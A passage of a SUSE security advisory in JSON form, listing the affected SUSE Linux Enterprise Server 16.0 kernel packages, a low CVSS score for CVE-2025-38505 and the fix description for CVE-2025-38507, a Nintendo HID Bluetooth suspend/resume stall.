"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 3.3,
"baseSeverity": "LOW",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "low"
}
],
"title": "CVE-2025-38505"
},
{
"cve": "CVE-2025-38507",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-38507"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nHID: nintendo: avoid bluetooth suspend/resume stalls\n\nEnsure we don\u0027t stall or panic the kernel when using bluetooth-connected\ncontrollers. This was reported as an issue on android devices using\nkernel 6.6 due to the resume hook which had been added for usb joycons.\n\nFirst, set a new state value to JOYCON_CTLR_STATE_SUSPENDED in a\nnewly-added nintendo_hid_suspend. This makes sure we will not stall out\nthe kernel waiting for input reports during led classdev suspend. The\nstalls could happen if connectivity is unreliable or lost to the\ncontroller prior to suspend.\n\nSecond, since we lose connectivity during suspend, do not try\njoycon_init() for bluetooth controllers in the nintendo_hid_resume path.\n\nTested via multiple suspend/resume flows when using the controller both\nin USB and bluetooth modes.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
